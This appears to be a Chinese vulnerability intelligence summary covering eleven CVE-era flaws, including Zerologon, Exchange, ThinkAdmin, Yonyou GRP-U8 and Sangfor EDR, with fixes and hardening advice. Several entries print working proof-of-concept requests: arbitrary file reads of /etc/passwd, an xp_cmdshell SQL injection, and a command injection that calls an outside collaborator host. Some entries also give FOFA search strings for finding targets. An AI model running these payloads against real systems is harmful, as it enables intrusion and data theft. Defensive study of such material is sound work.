重大网络行动漏洞情报整理
字数 2508 2025-08-15 21:32:00
重大网络漏洞分析与防护指南
1. NetLogon 特权提升漏洞(CVE-2020-1472)
漏洞概述
NetLogon远程协议(MS-NRPC)中存在的加密身份验证方案缺陷,CVSS评分10.0。攻击者可利用此漏洞控制域控制器并窃取域管理员凭据。
技术细节
- 漏洞根源:Netlogon远程协议在计算机密码更新过程中的加密验证缺陷
- 攻击方式:攻击者通过MS-NRPC连接到域控制器,获取域管理员访问权限
- POC发布:2020年9月11日由Tom Tervoort发布漏洞白皮书及验证代码
影响范围
Windows Server多个版本:
- Windows Server 2008 R2 SP1
- Windows Server 2012/2012 R2
- Windows Server 2016/2019
- Windows Server version 1903/1909/2004
(包括Server Core安装版本)
漏洞验证方法
- 获取域控DC名:
UNIQUE_NAMES = {
b'\x00': 'Workstation Service',
b'\x03': 'Messenger Service',
# 其他服务映射...
}
def nbns_name(addr):
# 通过Netbios-ns端口(137)获取计算机名
data = b'ff\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00 CKAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA\x00\x00!\x00\x01'
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.sendto(data, (addr, 137))
rep = s.recv(2000)
# 解析响应获取计算机名
- 使用验证脚本:
python3 zerologon_tester.py MASTERDC xxx.xx.xx.xx
修复方案
- 安装微软官方补丁:
- 补丁链接:https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472
- 配置自动更新:
- 运行
wscui.cpl - 选择"自动更新"选项
- 设置每日或特定时间自动更新
- 运行
2. Microsoft Exchange远程代码执行漏洞(CVE-2020-16875)
漏洞概述
Exchange Server中cmdlet参数验证不完善,攻击者可通过特制邮件在SYSTEM权限下执行代码。
影响版本
- Exchange Server 2016 CU16/CU17
- Exchange Server 2019 CU5/CU6
漏洞验证
Metasploit已集成利用模块:
https://github.com/rapid7/metasploit-framework/pull/14126
修复步骤
- 获取Exchange版本号:
- 参考:https://docs.microsoft.com/zh-cn/exchange/new-features/build-numbers-and-release-dates
- 检查受影响状态:
- https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-16875
- 下载对应安全更新包
3. Thinkadmin v6任意文件读取漏洞(CVE-2020-25540)
漏洞概述
ThinkAdmin后台管理系统(基于ThinkPHP)存在路径遍历漏洞,攻击者可通过GET请求编码参数读取服务器任意文件。
影响版本
≤ 2020.08.03.01版本
漏洞验证
- FOFA搜索:
"ThinkAdmin" && title=="系统登录 · ThinkAdmin" - 利用POC:
POST /admin.html?s=admin/api.Update/node HTTP/1.1
Host: xxxxxx
Content-Type: application/x-www-form-urlencoded
Content-Length: 22
rules=%5B%22.%2F%22%5D
- 获取版本信息:
https://xxxxx/admin.html?s=admin/api.Update/version
漏洞成因
Update.php中的函数方法未授权,可直接调用:
// app/admin/controller/api/Update.php
// 未授权函数导致漏洞
修复方案
升级到安全版本,参考:
https://github.com/zoujingli/ThinkAdmin/issues/244
4. 泛微云桥e-bridge目录遍历/文件读取漏洞
漏洞概述
通过/wxjsapi/saveYZJFile接口读取文件并保存,再通过/file/fileNoLogin/{id}读取文件内容。
影响版本
2018-2019版本
漏洞验证
- 保存文件:
/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt - 读取文件:
- 从响应中提取id
- 访问
/file/fileNoLogin/{id}
测试路径
paths = {
"linux": "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///etc/passwd&fileExt=txt",
"windows": "/wxjsapi/saveYZJFile?fileName=test&downloadUrl=file:///c://windows/win.ini&fileExt=txt"
}
修复方案
尽快升级到最新版本
5. 用友GRP-U8 SQL注入漏洞
漏洞概述
GRP-U8行政事业内控管理软件存在SQL注入漏洞,可导致命令执行。
漏洞验证
- FOFA搜索:
"用友GRP-u8" - 利用POC:
POST /Proxy HTTP/1.1
Content-Type: application/x-www-form-urlencoded
cVer=9.8.0&dp=<?xml version="1.0" encoding="GB2312"?><R9PACKET version="1"><DATAFORMAT>XML</DATAFORMAT><R9FUNCTION><NAME>AS_DataRequest</NAME><PARAMS><PARAM><NAME>ProviderName</NAME><DATA format="text">DataSetProviderData</DATA></PARAM><PARAM><NAME>Data</NAME><DATA format="text">exec xp_cmdshell 'net user'</DATA></PARAM></PARAMS></R9FUNCTION></R9PACKET>
修复方案
联系用友官方获取安全升级方案
6. 齐治堡垒机远程命令执行漏洞(CNVD-2019-20835)
漏洞概述
齐治运维堡垒机服务端存在命令执行漏洞,攻击者可获取服务器权限。
修复方案
- 更新至最新补丁
- 联系齐治科技技术支持
参考:
- https://www.shuzhiduo.com/A/Vx5MZkj3dN/
- https://www.cnvd.org.cn/flaw/show/1632201
7. 绿盟UTS综合威胁探针管理员任意登录漏洞
漏洞概述
V2.0R00F02SP02及之前版本存在管理员任意登录漏洞。
漏洞验证
- 使用admin登录并抓包
- 修改响应包:
- 将
{"status":false改为{"status":true
- 将
- 获取admin密码MD5值并登录
修复方案
升级至V2.0R00F02SP02以上版本:
http://update.nsfocus.com/update/listBsaUtsDetail/v/F02
8. 天融信数据防泄漏系统越权漏洞
漏洞概述
可越权修改管理员密码(2020年8月17日情报)
9. 深信服EDR远程命令执行漏洞
影响版本
<3.2.21
利用POC
POST /api/edr/sangforinter/v2/cssp/slog_client?token=eyJtZDUiOnRydWV9 HTTP/1.1
{"params": "w=1\"'test'\"|ping n5tcbkdcgf8hlj7xjc7578yau10soh.burpcollaborator.net"}
10. 宝塔面板未授权访问漏洞
影响版本
- Linux 7.4.2
- Linux测试版7.5.14
- Windows 6.8
漏洞验证
直接访问888端口的pma目录
修复方案
- Linux升级到7.4.3或测试版7.5.15
- Windows升级到6.9.0
参考:https://www.bt.cn/bbs/thread-54666-1-1.html
11. Spring Cloud Netflix Hystrix Dashboard SSRF
影响版本
- 2.2.0-2.2.3
- 2.1.0-2.1.5
漏洞验证
/proxy.stream?origin=http://www.baidu.com
修复方案
升级到:
- 2.2.4+ (2.2.x分支)
- 2.1.6+ (2.1.x分支)
综合防护建议
- 及时更新:所有系统保持最新安全补丁
- 最小权限:服务账户使用最小必要权限
- 网络隔离:关键系统(如域控)进行网络隔离
- 日志监控:加强安全日志收集与分析
- 漏洞扫描:定期进行漏洞扫描与渗透测试
- 应急响应:建立漏洞应急响应流程